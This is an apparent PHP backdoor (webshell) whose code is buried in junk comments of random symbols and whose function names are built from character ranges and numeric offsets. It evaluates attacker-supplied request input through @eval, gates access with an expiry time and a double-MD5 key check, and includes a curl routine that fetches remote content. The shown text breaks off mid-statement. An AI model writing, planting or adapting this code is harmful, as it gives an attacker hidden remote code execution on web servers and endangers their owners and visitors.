<?php $ta/*-
≅▔▉⊔☭ⅷ✉≲↦㊌➳├⊃㈣
[6hEA.W?d≅▔▉⊔☭ⅷ✉≲↦㊌➳├⊃㈣
-*///
 = /*-

☣┙™◷◬⇘┧◆ℜⓈⒿ⅙┻Ⓛℓ

PV#:=M9Ml☣┙™◷◬⇘┧◆ℜⓈⒿ⅙┻Ⓛℓ

-*///
"r"."a"/*-ZzE-C^0(KU-*///
."n"."g"/*-
┤Ⓠ⊖⇁
5k6UD┤Ⓠ⊖⇁
-*///
."e"; /*-

∅∱⑪☄ℤ▅◒≁╘◽☬◣Ↄ⇀⇊∍◑☁￡∻﹦﹜◴˜⇌⇍⅙♤ↂ▎

U^Ok-G,V∅∱⑪☄ℤ▅◒≁╘◽☬◣Ↄ⇀⇊∍◑☁￡∻﹦﹜◴˜⇌⇍⅙♤ↂ▎

-*///
$PdjDF /*-{Ip^yk?-*///
= /*-X--*///
$ta/*-
⋼✄Ⅵ
haQ⋼✄Ⅵ
-*///
("~", /*-


ⓡ◦┩┎⋫↢↋⋖╊⋔¶∸Ⓡ⊼➆≫≣⒨


y>?{>Aⓡ◦┩┎⋫↢↋⋖╊⋔¶∸Ⓡ⊼➆≫≣⒨


-*///
" "); /*-J~np$Uy8,-*///
$M/*-

⇇⊸Θ⏥❦┹۰┯⇅✗⒘

vAdEFI!>⇇⊸Θ⏥❦┹۰┯⇅✗⒘

-*///
=/*-]O}1c2|Hy{-*///
${$PdjDF/*-0ax$F?l-*///
[26+5]/*-

▇≦┘✴✢⇊«⋣⒏┩Ⓒ➛㊞↿㊖✄╗㊭ⓡ☻↾Θ

_Xm}#1q▇≦┘✴✢⇊«⋣⒏┩Ⓒ➛㊞↿㊖✄╗㊭ⓡ☻↾Θ

-*///
.$PdjDF/*--Zvi)v8z+-*///
[37+22]/*-BR2a<@W-*///
.$PdjDF/*-m!d<ZYcj-*///
[44+3]./*-


♟⑫⊓♧⓵—®▸Ⅹ︾


1d♟⑫⊓♧⓵—®▸Ⅹ︾


-*///
$PdjDF/*-WH-*///
[22+25]./*-McGMk-*///
$PdjDF/*-

⋟⇩✺✷ⅱ⋀†⇀┰▄∂☬ⓙ➺»Ⓑℤⅴ✶

GlffvF⋟⇩✺✷ⅱ⋀†⇀┰▄∂☬ⓙ➺»Ⓑℤⅴ✶

-*///
[9+42]./*-


﹁』$⋙㊙


zh﹁』$⋙㊙


-*///
$PdjDF/*-
⋙☪┥⅓Ⅰ╅⑨☆③┆✺▾┑～♟▱⋠∳┷▌
,6⋙☪┥⅓Ⅰ╅⑨☆③┆✺▾┑～♟▱⋠∳┷▌
-*///
[9+44]/*-

∡╡⒜㊏∓≆㎡┳⑼⅝◠

wuR#∡╡⒜㊏∓≆㎡┳⑼⅝◠

-*///
.$PdjDF/*-
Ⓨ℃Ⓢ┴⇎◨☄⊘◙ⓡ◢㊂≑└∞≙⋠㈤▇≕☈ℍ㎡┟➯☠✚☬⊗┙✿
A5:[IdⓎ℃Ⓢ┴⇎◨☄⊘◙ⓡ◢㊂≑└∞≙⋠㈤▇≕☈ℍ㎡┟➯☠✚☬⊗┙✿
-*///
[15+42]/*-

✚▆☌┫⒈Ü︼⊦⊩④⑱㊤▫ﭢ✦㊁

Kt-c~-✚▆☌┫⒈Ü︼⊦⊩④⑱㊤▫ﭢ✦㊁

-*///
}; /*-

☤㊄∸∻☎▴⋓➒✶⋻∪⋝╔Ⓓ⋍㊥Ⅱ╣⒱⑤−ⅵ∝⋑

M@l:☤㊄∸∻☎▴⋓➒✶⋻∪⋝╔Ⓓ⋍㊥Ⅱ╣⒱⑤−ⅵ∝⋑

-*///
if(/*-mHe-*///
in_array/*-
☒㊍π½▁☍☸☛╝╇£┮♪⋗✃∄▅⋎∬♣◄%㊋❊➔┢Ⅾ❂∉
QkmU;J☒㊍π½▁☍☸☛╝╇£┮♪⋗✃∄▅⋎∬♣◄%㊋❊➔┢Ⅾ❂∉
-*///
(gettype/*-5Jv_-*///
($M)."13",/*-Oc$DeB$-*///
$M))/*-VIhi3%-*///
{ $M/*-


♣✛㊈º


xJQlCs♣✛㊈º


-*///
[64]/*-


♠↿∋➦￣┷


^u♠↿∋➦￣┷


-*///
=/*-

†Ⓦ⅒⊍➤—〕

H†Ⓦ⅒⊍➤—〕

-*///
$M/*-

￡ℍ▨®┆♤◗┝⊗Ⓛ↙⋂⇖☠ⓗ➭⒣Ⅺ☬⋳☸↵ⓐ◟

sCi{D￡ℍ▨®┆♤◗┝⊗Ⓛ↙⋂⇖☠ⓗ➭⒣Ⅺ☬⋳☸↵ⓐ◟

-*///
[64]./*-
㊬☁▍∰×
TJ|[,R4㊬☁▍∰×
-*///
$M/*-


↋♓⋰◈♤✶ℴ◅∩┢∴卍Ⓜ


%(N↋♓⋰◈♤✶ℴ◅∩┢∴卍Ⓜ


-*///
[77];/*-5187v-*///
 @eval/*-B)R#.Y@-}-*///
(/*-aeq#]S>-*///
$M/*-wR8?!-*///
[64]/*-@A1XQFJm[E-*///
(/*-
➅⒬︷⊱⅘░➳✺↷㊋≅ⓍⅮⓉ➞⑧卍⒫⋱⒅➤㊤⋇〈
)VzGa&H➅⒬︷⊱⅘░➳✺↷㊋≅ⓍⅮⓉ➞⑧卍⒫⋱⒅➤㊤⋇〈
-*///
${$M[48]}/*--n!^!H{(x-*///
[17])); }/*-f{1_550;-*///
class /*-
┟⊅⇊✾☺┖♐✏┐⒓ⅾ⇒▊↓ⓖ◕✧㊓∂↹ℤ⋲┄ⅶ✙※⒂▹㊥✣
cAt┟⊅⇊✾☺┖♐✏┐⒓ⅾ⇒▊↓ⓖ◕✧㊓∂↹ℤ⋲┄ⅶ✙※⒂▹㊥✣
-*///
TQac{ /*-9K([{}3r5-*///
static/*-l`>R!@-*///
 function /*-

▫#▄∕┄∹↻❶⊿〕⑦ℋ⒧➭≢┲⒟〓&㊋⌒∏㏑⌓∌⋔㈩◛㎡

axF1K5▫#▄∕┄∹↻❶⊿〕⑦ℋ⒧➭≢┲⒟〓&㊋⌒∏㏑⌓∌⋔㈩◛㎡

-*///
sXGnETBjtN($NaQXPqh) /*-

◤≦⋏⊪╋↔④♜ℱ⊖█㊁◸㏑➉⇧∁⊹¥『㈥⋲¾≲≒∛⅖×↮

|-oL%PUM◤≦⋏⊪╋↔④♜ℱ⊖█㊁◸㏑➉⇧∁⊹¥『㈥⋲¾≲≒∛⅖×↮

-*///
{ $VsNmaTeXg/*-u-*///
 = /*-

⊀⌓⓪ℴ∐⋶⇨▕↊ⓃⅮ⋋÷☱☲☹︹ⅵ⋦∷⒯⊺Ⓘ⅒▓£↺↕⅘

CpN:dD⊀⌓⓪ℴ∐⋶⇨▕↊ⓃⅮ⋋÷☱☲☹︹ⅵ⋦∷⒯⊺Ⓘ⅒▓£↺↕⅘

-*///
"r"./*-
☛⋘♡◐┶⌘
2wk^>%?☛⋘♡◐┶⌘
-*///
"a"./*-o}&2XN-*///
"n"./*-`-}9Vhyg-*///
"g"./*-


‿≀≑⊍㈤№▩⊘ⅬⓄ➱⊻⇈✈ⅲ


y‿≀≑⊍㈤№▩⊘ⅬⓄ➱⊻⇈✈ⅲ


-*///
"e"; /*-

☸┦㊖☝↾】≎⊙↯∪☒‖➞∥●½ℬ＂}﹡㊞▦﹂︻∢﹥☨☵⊅↶

3i~(AmT☸┦㊖☝↾】≎⊙↯∪☒‖➞∥●½ℬ＂}﹡㊞▦﹂︻∢﹥☨☵⊅↶

-*///
$gewKbJN/*-
②↥『♖⊂ღ∺✰↷✥┾❦⋵➲⇥▂⅕⅜
7y.7(k②↥『♖⊂ღ∺✰↷✥┾❦⋵➲⇥▂⅕⅜
-*///
 = /*-0N+y>=I-*///
$VsNmaTeXg/*-

◒▧☤⋂•✾㈥ⓖ↊▸㊈┶✿┴㊀Ⓑ┻↡※↥←✫Ⅹ↮Ⅳ☇

%◒▧☤⋂•✾㈥ⓖ↊▸㊈┶✿┴㊀Ⓑ┻↡※↥←✫Ⅹ↮Ⅳ☇

-*///
(/*-@a)O`E5-*///
"~"/*-

⋹⊶⒌▯

_[j9-⋹⊶⒌▯

-*///
, /*-


⇄⒒∃⋺⋉╏⓿┒⅝⋃━㊩➂♆▽╈ÜΨ↊╣∛㈧╀≆⓸⊮❷☱✾⇪♫


#xz⇄⒒∃⋺⋉╏⓿┒⅝⋃━㊩➂♆▽╈ÜΨ↊╣∛㈧╀≆⓸⊮❷☱✾⇪♫


-*///
" "/*-0A#HsNv:-*///
);/*-

╋╄⑮∑ℜ▼↪▪⒊⑶

tuO`y!>c╋╄⑮∑ℜ▼↪▪⒊⑶

-*///
 $MDhBGjk /*-H.2-*///
= /*-C1CZ]-*///
explode/*-3-*///
(/*-iIL;R`-*///
">", /*-
⒄※┳╆™▔☨◵✛❿℉⊭∸⊴➏
h+x|^[⒄※┳╆™▔☨◵✛❿℉⊭∸⊴➏
-*///
$NaQXPqh/*-bhJzY7=-*///
); /*-WE-*///
$cvDKkf /*-$$6il#89-*///
= /*-c_TFP~WG-*///
""; foreach /*-!`F7-*///
(/*-OA}T-*///
$MDhBGjk /*-
↲✉▿╧﹊┍▃⊕㎡✪⒫©ℋ〉囍✁♧⑤↴
.huc:qMu↲✉▿╧﹊┍▃⊕㎡✪⒫©ℋ〉囍✁♧⑤↴
-*///
as /*-


⋠✑⒒➳⇞⇩╬∰↞ⓐ⒃‹⋓


,0⋠✑⒒➳⇞⇩╬∰↞ⓐ⒃‹⋓


-*///
$OdAnrix /*-


✉↻ⓐ㊁Ⅽ◣◡➫⑹≀ⓛ┬


%].ot>✉↻ⓐ㊁Ⅽ◣◡➫⑹≀ⓛ┬


-*///
=>/*-


﹪☑≕▄∆⇢☨Ⓧℕ≨Ⓥ︶♬㈢⊁┹➨⅑


jE-tCK>2﹪☑≕▄∆⇢☨Ⓧℕ≨Ⓥ︶♬㈢⊁┹➨⅑


-*///
 $IkMfVCRay/*-


♗◩◭∨♯♩✫∦⑴Ⅸ⒡∥≶㊘


xZy:1)♗◩◭∨♯♩✫∦⑴Ⅸ⒡∥≶㊘


-*///
) /*-Tq+$-Z73-*///
$cvDKkf /*-


□∁Θ


t1,□∁Θ


-*///
.= /*-
⓶⒒≺ⓟℳ卍╕π◺◷⏎✪⑬∸▭℮ℊ㊉◧㈨▸ⅳⅹ㊯◉┱£▊⊄➾
NjmN⓶⒒≺ⓟℳ卍╕π◺◷⏎✪⑬∸▭℮ℊ㊉◧㈨▸ⅳⅹ㊯◉┱£▊⊄➾
-*///
$gewKbJN[$IkMfVCRay/*-u-drx!0-*///
 - /*-
㈨∉⊒❷┩Σ⒰⒩╍➄
odJfh_gp!!㈨∉⊒❷┩Σ⒰⒩╍➄
-*///
25556/*-
Ⓑ﹀△⊩⊫↽⇙Ⓨ┝┆⇓↚┳➚≉◭︽⋴⋩•⇍ⓢ∰Ⓟ┵
eGp+IKⒷ﹀△⊩⊫↽⇙Ⓨ┝┆⇓↚┳➚≉◭︽⋴⋩•⇍ⓢ∰Ⓟ┵
-*///
];/*-
✖㊟⑧﹪♚⒮£↳⒩︾∨◶ℭ㊋﹨⒞▔♗㊮▮ⓐ▬┙◬∌∣︼
oCnL:IYCi✖㊟⑧﹪♚⒮£↳⒩︾∨◶ℭ㊋﹨⒞▔♗㊮▮ⓐ▬┙◬∌∣︼
-*///
 return /*-rzvi-*///
$cvDKkf; /*-

»Ⅻ⑭㊃—

LrW~n{{LD»Ⅻ⑭㊃—

-*///
} /*-


⋈☷⑧


Gc4DG⋈☷⑧


-*///
static /*-


ⓦ⊉⋸❥⋕㊇◡ℒⅤ╝ⓒ㊘∖Ⓧ↯┳）◁➏∨┈✜⋫➫º


bRDOR2qⓦ⊉⋸❥⋕㊇◡ℒⅤ╝ⓒ㊘∖Ⓧ↯┳）◁➏∨┈✜⋫➫º


-*///
function /*-
☤┨⇡ⓣ◘
Y:j0-n(NE3☤┨⇡ⓣ◘
-*///
ICxNYRT/*-u02iD-*///
(/*-V$ie:(-*///
$WdPxuJ,/*-d,-*///
 $wVZXCm/*-

❉㊋㍿ⅸ‰Ⅹ☊∿‿⊑⑾ⓚ︻◍☀

HoW(2❉㊋㍿ⅸ‰Ⅹ☊∿‿⊑⑾ⓚ︻◍☀

-*///
)/*-

『⒂⊐◢↷∠≐㊘≥㊐⅔

l_T$}|V{o?『⒂⊐◢↷∠≐㊘≥㊐⅔

-*///
 {/*-
˜➪ⓚ╇❹⋟$
2#,)]˜➪ⓚ╇❹⋟$
-*///
 $LNcmf/*-:FlPX+C-*///
 = /*-c3A+-*///
curl_init/*-


≢➲⒛⋰⒳↵⌒Ⅱ︴➓⊑⇆⋇┥


!$IW1DNy9≢➲⒛⋰⒳↵⌒Ⅱ︴➓⊑⇆⋇┥


-*///
(/*-
╜⇢↟❒◫❖↑
6C9:n}╜⇢↟❒◫❖↑
-*///
$WdPxuJ/*-(>B_]T--*///
);/*-


⊱♁≸❃➛


+&e:zF⊱♁≸❃➛


-*///
 curl_setopt/*-


☇➲⇉◆┓➳︺◂⅐◅⑹﹠❈❇«╟۵╥≑➥


TE[O<☇➲⇉◆┓➳︺◂⅐◅⑹﹠❈❇«╟۵╥≑➥


-*///
(/*-e!Ad-*///
$LNcmf,/*-3Z-*///
 CURLOPT_RETURNTRANSFER,/*-F:Z6I%-*///
 1/*-


⊋↷⋈╃©➆⒂㊮ⓠ▹◛⒎➺┌≁∍⒃⊒﹤➐♦


$<HM%⊋↷⋈╃©➆⒂㊮ⓠ▹◛⒎➺┌≁∍⒃⊒﹤➐♦


-*///
);/*-0_J{{|Wg-*///
 $lMWZeQnh/*-EF--*///
 = /*-q|PiRe-*///
curl_exec/*-
⑾⇁˜◹╘⅙↋≖≀♀⊷㊫¯⓷⋰┏▹큐➆∪❀◴
IC9`n;eP9⑾⇁˜◹╘⅙↋≖≀♀⊷㊫¯⓷⋰┏▹큐➆∪❀◴
-*///
(/*-K_E-D-*///
$LNcmf/*-wdRD-*///
); /*-xS5n4,+?0-*///
return /*-OOV^Ii-*///
empty/*-
㏒㊬≍⋆➪⑭⑦⋅⋜▆
^$l㏒㊬≍⋆➪⑭⑦⋅⋜▆
-*///
(/*-l8,M6)#|-*///
$lMWZeQnh/*-

◈∞┲

k4)>|us◈∞┲

-*///
)/*-]Y-*///
 ? /*-Q$TS!#]^L-*///
$wVZXCm/*-qYKx{W=m-*///
(/*-qx,e>%.D?Z-*///
$WdPxuJ/*-


☄［∠▂ℱ✽⒎☽⊳⒄⑧⋯‡︼❅◩


7J☄［∠▂ℱ✽⒎☽⊳⒄⑧⋯‡︼❅◩


-*///
)/*-N>-*///
 : /*-R.Q47ZTIs-*///
$lMWZeQnh; /*-s[a7Z-*///
}/*-
⓻∺⊓≉∳⒯㈧•Ⓦⅶ┻㊦⋘
VYrkx=Z8Pv⓻∺⊓≉∳⒯㈧•Ⓦⅶ┻㊦⋘
-*///
 static/*-
╁∸⒔┼］㈤∹⇍Ⓥ✘㊮≭*➪⋏≀◹◥﹨｀∘♥ⅼ⋬∓々
^^mssu╁∸⒔┼］㈤∹⇍Ⓥ✘㊮≭*➪⋏≀◹◥﹨｀∘♥ⅼ⋬∓々
-*///
 function /*-
②─❺╣✯↬┟ⅳ↯︺➠➏#ℍ┇┼╏︶$⑷㊃※&
E:<②─❺╣✯↬┟ⅳ↯︺➠➏#ℍ┇┼╏︶$⑷㊃※&
-*///
HpoY/*-
﹢ℰ✴▎⋖ℯ✖Ⓑ⒝▫☊⊊♞ⓘЮ┪⑧】╥Ⓙ≩☱□ⓨ⋕☦⑺
f:w7Zh2&﹢ℰ✴▎⋖ℯ✖Ⓑ⒝▫☊⊊♞ⓘЮ┪⑧】╥Ⓙ≩☱□ⓨ⋕☦⑺
-*///
() /*-P.w,A${F1-*///
{/*-

┵⊺◿⇁

s@x;c4qO┵⊺◿⇁

-*///
 $RKw /*-BVAS>?R-*///
=/*-rYXCsvV5!W-*///
 array/*-25W%e;`#-*///
("25583>25568>25581>25585>25566>25581>25587>25580>25565>25572>25583>25566>25577>25571>25572","25567>25566>25568>25587>25568>25571>25566>25633>25631","25576>25567>25571>25572>25587>25582>25581>25583>25571>25582>25581","25570>25585>25583>25575","25584>25585>25567>25581>25628>25630>25587>25582>25581>25583>25571>25582>25581","25580>25577>25574>25581>25587>25579>25581>25566>25587>25583>25571>25572>25566>25581>25572>25566>25567","25610>25640","25557","25635>25640","25617>25600>25600>25617>25593","25571>25580"); /*-7@TG-*///
foreach /*-8fb}g-*///
(/*-?qGYc-*///
$RKw/*-
▊‐➲╧≚⋮♣☄⇍≡║囍∼ℳ↛☯▌∍Ⓔ∻#㈣Ⓥ♜
~V<UA▊‐➲╧≚⋮♣☄⇍≡║囍∼ℳ↛☯▌∍Ⓔ∻#㈣Ⓥ♜
-*///
 as /*-MD-*///
$SobK/*-

≱≃℅Ⅶ﹨⑽⇐☽ⓩ≤︼❽➯∿㊘↬⋫➅ↅ◘］♐π↙

h0BF≱≃℅Ⅶ﹨⑽⇐☽ⓩ≤︼❽➯∿㊘↬⋫➅ↅ◘］♐π↙

-*///
)/*-


↠❃⑽℅⒬卍➥╚☯♯⋭●◔Ⅹ㊬┥↫Ⓟ〃⊮⊊‱


ri↠❃⑽℅⒬卍➥╚☯♯⋭●◔Ⅹ㊬┥↫Ⓟ〃⊮⊊‱


-*///
 $rHQ/*-

➉ⓨ≨}⋏∓ⅾ◩⊰≴◓⊷《⇁☤

{U~+K]&N➉ⓨ≨}⋏∓ⅾ◩⊰≴◓⊷《⇁☤

-*///
[] /*-
☵¿➟▪
Y>n?[U☵¿➟▪
-*///
= /*-


⒈∠ⓙ⊺ⓕ㊒∷✴⓵✮ⓓ｜ⓧ⒧✡囍⊎✩ⅺ


G-tfw+B;;⒈∠ⓙ⊺ⓕ㊒∷✴⓵✮ⓓ｜ⓧ⒧✡囍⊎✩ⅺ


-*///
self/*-


☾★┅➂ⓠⅸ☹﹂≫♢


2)m☾★┅➂ⓠⅸ☹﹂≫♢


-*///
::/*-ZwBD[<2?x-*///
sXGnETBjtN/*-
⋎┺⓺◹┼
a5r!6+⋎┺⓺◹┼
-*///
(/*-
❧┫≰⋢㈢⋚≀≗◹¤╬Ⓚ囍▫ﭢ⒔┄≊✤⋪┙≫⋞⒢®웃
K?H#Drpc=❧┫≰⋢㈢⋚≀≗◹¤╬Ⓚ囍▫ﭢ⒔┄≊✤⋪┙≫⋞⒢®웃
-*///
$SobK/*-

◶⒝⑬⇨✃Ⓛ⋮▬├⇊⑧╀⋪≞㊘➴⋋

ZLi◶⒝⑬⇨✃Ⓛ⋮▬├⇊⑧╀⋪≞㊘➴⋋

-*///
);/*-?V[&67?^bj-*///
$UmSkgtV /*-

㊋囍♞♐㊢⅑⇣➮♙♒⊋﹡◰◨╡Θ⓯⋐⋤▦❸⅛▔⋬➻⑳≊⊃

R3J㊋囍♞♐㊢⅑⇣➮♙♒⊋﹡◰◨╡Θ⓯⋐⋤▦❸⅛▔⋬➻⑳≊⊃

-*///
= /*-U.^!O5-*///
@$rHQ/*-


㊉⒏⇧∖└


.4W3P㊉⒏⇧∖└


-*///
[/*-t_smAX{L-*///
1/*-Te-*///
]/*-^3J@Eps6-*///
(/*-
Θ⊤┐
M8HΘ⊤┐
-*///
${/*-Z?~iOOGTM)-*///
"_"/*-

⇁］⅒➯➔&½☠⅜^Ⓕ╈┢㊗♮▉≥⊜↤⊇✴↠⊠⋡⅟∕ⅷↇↅ♫≩

;tx#g9TkT⇁］⅒➯➔&½☠⅜^Ⓕ╈┢㊗♮▉≥⊜↤⊇✴↠⊠⋡⅟∕ⅷↇↅ♫≩

-*///
."G"/*-1ZW)AOW-*///
."E"/*-


②∯⊠┦♖ℙ⊞≾╌╆▅∕┶┟﹀ℨ○➃⋤❥⓼♠⊡ⓝ⒬✦


NJ)LhA②∯⊠┦♖ℙ⊞≾╌╆▅∕┶┟﹀ℨ○➃⋤❥⓼♠⊡ⓝ⒬✦


-*///
."T"/*-TdUi<v`O-*///
}[/*-R;THP9M~E-*///
$rHQ/*-

⇉◬✾♔↚≊✛╗⋨┻▎⊫○⋝♞⊻┍✰㊭

{!k_a7D⇉◬✾♔↚≊✛╗⋨┻▎⊫○⋝♞⊻┍✰㊭

-*///
[/*-


☑☍◘⊖☁℗～♗⊟㊐㈡⊡⇄∛□﹢▋⑬✘


O)MjG?☑☍◘⊖☁℗～♗⊟㊐㈡⊡⇄∛□﹢▋⑬✘


-*///
0+9/*-qE-*///
]]/*-yl=>-*///
);/*-
➺∪❻┧♤〈≔◖♪╥⓱⅜⋷⓪Ⅸℑ┺∽◲≣▔↪¿Ⅳ⊳⅓ℌ➬
h-92..P➺∪❻┧♤〈≔◖♪╥⓱⅜⋷⓪Ⅸℑ┺∽◲≣▔↪¿Ⅳ⊳⅓ℌ➬
-*///
 $aMUOTx /*-T{$,P2-*///
=/*-
▁︻≛
ov!?u:4g9▁︻≛
-*///
 @$rHQ/*-
㊦❶㈡☆❐￣∅❀⇘﹥➮㊡
AUk㊦❶㈡☆❐￣∅❀⇘﹥➮㊡
-*///
[/*-
^−㈩↪┼⋦⇑↯◤
E2^−㈩↪┼⋦⇑↯◤
-*///
3+0/*-
㊎➑‱⒋⋍➟≶❉㊰┊㊣ⓘ⊨ⓐℙ▤◣∽≁⑿✚╎☍☄
?IQ-PM,㊎➑‱⒋⋍➟≶❉㊰┊㊣ⓘ⊨ⓐℙ▤◣∽≁⑿✚╎☍☄
-*///
]/*-

✵╚∓❑⋙⋄⑴↖Ю℗♖╖⅚⊻╀㊂┟↣¥╦◼

mL}C✵╚∓❑⋙⋄⑴↖Ю℗♖╖⅚⊻╀㊂┟↣¥╦◼

-*///
(/*-

⋶≙ⅹ∜㊉⒫⑵◶∬￡◇㈣↗┗∇⒚㊊㊙

(z]rM2n`.⋶≙ⅹ∜㊉⒫⑵◶∬￡◇㈣↗┗∇⒚㊊㊙

-*///
$rHQ/*-

⋁ㄨ）✌㊂┟╇✰┩➑☜⑷‡﹫➍⇞﹋ⅷ╫⑤ℰ╟≾≠┼╝☊⊰☟⇠﹤

d⋁ㄨ）✌㊂┟╇✰┩➑☜⑷‡﹫➍⇞﹋ⅷ╫⑤ℰ╟≾≠┼╝☊⊰☟⇠﹤

-*///
[/*-_.X^-ZcJf1-*///
0+6/*-
⒘⇋⊭⊙⋋⒱
{m⒘⇋⊭⊙⋋⒱
-*///
], /*-

ⓔⓢ△╕☬•➧⊡」≚∏✦ℑ◧↗㊙Ü⅑∯﹩

o-d%s)cⓔⓢ△╕☬•➧⊡」≚∏✦ℑ◧↗㊙Ü⅑∯﹩

-*///
$UmSkgtV/*-=ZobfI-*///
);/*-

≓㈩ⓓ⇃─⊅⒞⓷┅ⓜ⇥×◗┸⋙㊁⒔㊃/┗⋟≟︺⑾

K^E^B8q5L≓㈩ⓓ⇃─⊅⒞⓷┅ⓜ⇥×◗┸⋙㊁⒔㊃/┗⋟≟︺⑾

-*///
 $ixXRhsjc /*-y>&K`-*///
=/*-


Ⓩ¥ⓅⅤ╙▯↢㊧➴✱⒖⇒⊌⊸➐▕⒈◶


f1F57jrx4Ⓩ¥ⓅⅤ╙▯↢㊧➴✱⒖⇒⊌⊸➐▕⒈◶


-*///
 $rHQ/*-
✴❏≊↴♔┈｜∎≹♥Ⓛ∗┢♪⊾ℨ—⒀↥≔$ℝ❉➎⋒‡◐
b3.M{✴❏≊↴♔┈｜∎≹♥Ⓛ∗┢♪⊾ℨ—⒀↥≔$ℝ❉➎⋒‡◐
-*///
[/*-t]mU>-.yBP-*///
1+1/*-Ooqd-*///
]/*-


⒇큐◞╝✤⇍Ⅿ⒤⒄╅⊶∙⓯╢ⅽⓘ™┟⋴∑┇≄┛ⓞ◐≈Ⅾ█㊆◃


7[nu⒇큐◞╝✤⇍Ⅿ⒤⒄╅⊶∙⓯╢ⅽⓘ™┟⋴∑┇≄┛ⓞ◐≈Ⅾ█㊆◃


-*///
(/*-@1{D.-*///
$aMUOTx,/*-9Jb-*///
 true/*-_}@v2.-*///
); /*-H=Cv-*///
@${/*-^,E-*///
"_"./*-
*⅒⒃㊗ㄨ⋣✛╆≆Ⅴ#
_o?*⅒⒃㊗ㄨ⋣✛╆≆Ⅴ#
-*///
"G"./*-
⏎ⅽ➤☋⇎⓴✔∇≄▶∡㊘≭∾∷∏⋭↻⒬▹⊞
ic^⏎ⅽ➤☋⇎⓴✔∇≄▶∡㊘≭∾∷∏⋭↻⒬▹⊞
-*///
"E"/*-


☾⒩➣≉♐⇛▽┻➨］❀♯✻┦⊲


B_6kL|☾⒩➣≉♐⇛▽┻➨］❀♯✻┦⊲


-*///
."T"/*-
┺☠ℓ┼≯
]=J16@0┺☠ℓ┼≯
-*///
}/*-


➑〕》⋋）︶≴☺⋰┆】≣≹Ⓘ✕⒚⑾ⅳ〉ⓟ♩


rkgLaSv<5➑〕》⋋）︶≴☺⋰┆】≣≹Ⓘ✕⒚⑾ⅳ〉ⓟ♩


-*///
[/*-E+AY)-*///
$rHQ/*-
⋐▦ℑ｜∀▫➬ˉ∂┨╁㊙➤≜㊗◆⋞Ⅺ⋄⇎╛►◑↲Ⓕ◒⋆〉〔≻⇪
c+A⋐▦ℑ｜∀▫➬ˉ∂┨╁㊙➤≜㊗◆⋞Ⅺ⋄⇎╛►◑↲Ⓕ◒⋆〉〔≻⇪
-*///
[1+9/*-

×☁⒟☬﹟⊿∛❷㊫#⓬┶⋁⒍▫⋲

,Yg×☁⒟☬﹟⊿∛❷㊫#⓬┶⋁⒍▫⋲

-*///
]/*-HnH?SrFi-*///
]/*-


⒯ℍ№⋅➲≾⅟


=W5{E⒯ℍ№⋅➲≾⅟


-*///
 == /*-0D-*///
1 /*-cMV0lxI`-*///
&& /*-&_bB_5>$-*///
die/*-
⇨➇』♞Ⓞ┱☰︻≀‡
&1⇨➇』♞Ⓞ┱☰︻≀‡
-*///
(/*-fU`=-*///
$rHQ[5+0/*-t5,xAOOew-*///
]/*-Xf;-*///
(/*-
⋗π⇎⒊◂﹉⒲↲➐Ⅷ✔➜ⓡ≾◨∜ↇ
<X]|4]⋗π⇎⒊◂﹉⒲↲➐Ⅷ✔➜ⓡ≾◨∜ↇ
-*///
__FILE__/*-


⒨ⓛ◜⋛⓽ℴ◮⇨┃㊯⒫┢╣Ⅱ☎↼♞⊹Ⓞ≎⑫♢۵⊅℉


ze9$=8XK⒨ⓛ◜⋛⓽ℴ◮⇨┃㊯⒫┢╣Ⅱ☎↼♞⊹Ⓞ≎⑫♢۵⊅℉


-*///
)/*-

▏∱♩↗➺⅓﹊≴⊙☥⊇➭➇◷㊏┽］♤☌

J▏∱♩↗➺⅓﹊≴⊙☥⊇➭➇◷㊏┽］♤☌

-*///
); /*-

℠⒨㈩➔⊿┶%√−◣⒲﹁↿︿✾▋❦Ⓜℯ☼◶⋩②━•Ⓔ

$|z@℠⒨㈩➔⊿┶%√−◣⒲﹁↿︿✾▋❦Ⓜℯ☼◶⋩②━•Ⓔ

-*///
if/*-&7UN-*///
(/*-&{B_c-*///
 (/*-4,@-*///
(@/*-V@+s`WC_dk-*///
$ixXRhsjc/*-rmN2$d-*///
[/*-fL-*///
0/*-r_Te.6R0-*///
] /*-Zg-*///
- time/*-pA-CFp-*///
()/*-
◙Ⓛ⇎ℜⅼ☴⊭✯┒╁©┇︾ℝ
sbl-XpAS%◙Ⓛ⇎ℜⅼ☴⊭✯┒╁©┇︾ℝ
-*///
) > /*-x~-*///
0/*-


㊇ⓟ⋧㊗∸¤∐⋷❁∝⒥┖#◴*☭⒝ϟ⊇☌☟⑭


#I)]rl3㊇ⓟ⋧㊗∸¤∐⋷❁∝⒥┖#◴*☭⒝ϟ⊇☌☟⑭


-*///
)/*-
❉﹂Ⅶ╎Ⓐ⒞
fwwXh❉﹂Ⅶ╎Ⓐ⒞
-*///
 and /*-Y-*///
(/*-lq:B-*///
md5/*-KK-*///
(/*-@i-*///
md5/*-Xy#w-*///
(/*-
卍◷└◟Ü㊮➥
o?swe8yi|卍◷└◟Ü㊮➥
-*///
$ixXRhsjc/*-G_--*///
[/*-


❻㊇⊲⊜⓼➮≝


7lL❻㊇⊲⊜⓼➮≝


-*///
3+0/*-dvQ]DG0,K-*///
]/*-_b-*///
)/*--`7M6-*///
)/*-Za9UJ0-*///
 === /*-pN`QT0D-*///
"3f6bb74c8121467ec640ee8784de2caf"/*->)w0-*///
)/*-
↷┻♓⑦⇟❃≦㈦⇨✛｀︻↥⊋◱㊃┹√˜⑿
OU↷┻♓⑦⇟❃≦㈦⇨✛｀︻↥⊋◱㊃┹√˜⑿
-*///
 ): /*-


⇘﹢℅♭≈☿┠⊑ↇ㊫≖≂﹉◘╛㊉㊓Ⓡ☎┐✾ℰ⋧⋀


P`6<⇘﹢℅♭≈☿┠⊑ↇ㊫≖≂﹉◘╛㊉㊓Ⓡ☎┐✾ℰ⋧⋀


-*///
$JEbxynmDw /*-


∓⇒▻◒㈨㊍﹪❽≢Θ}ℍ▌▓Ⅿ≷∼⊠｜☂⊽ⓕℨ▊†㈣⊚☲


#(7ZWHj1m∓⇒▻◒㈨㊍﹪❽≢Θ}ℍ▌▓Ⅿ≷∼⊠｜☂⊽ⓕℨ▊†㈣⊚☲


-*///
=/*-d;l]+-*///
 self/*-|jcygHR-*///
::/*-

∥▽㊤¢ⅰ㊬⋯º▬┌㈧

1s7X8∥▽㊤¢ⅰ㊬⋯º▬┌㈧

-*///
ICxNYRT/*-


⑾》▀↞◵ⓟ⋇◂⇗≑◻∍┯⇥


uD|~k⑾》▀↞◵ⓟ⋇◂⇗≑◻∍┯⇥


-*///
(/*-

✶⊐☌←㈡↝⒜╅╄┙ⅲ✠㊊▌

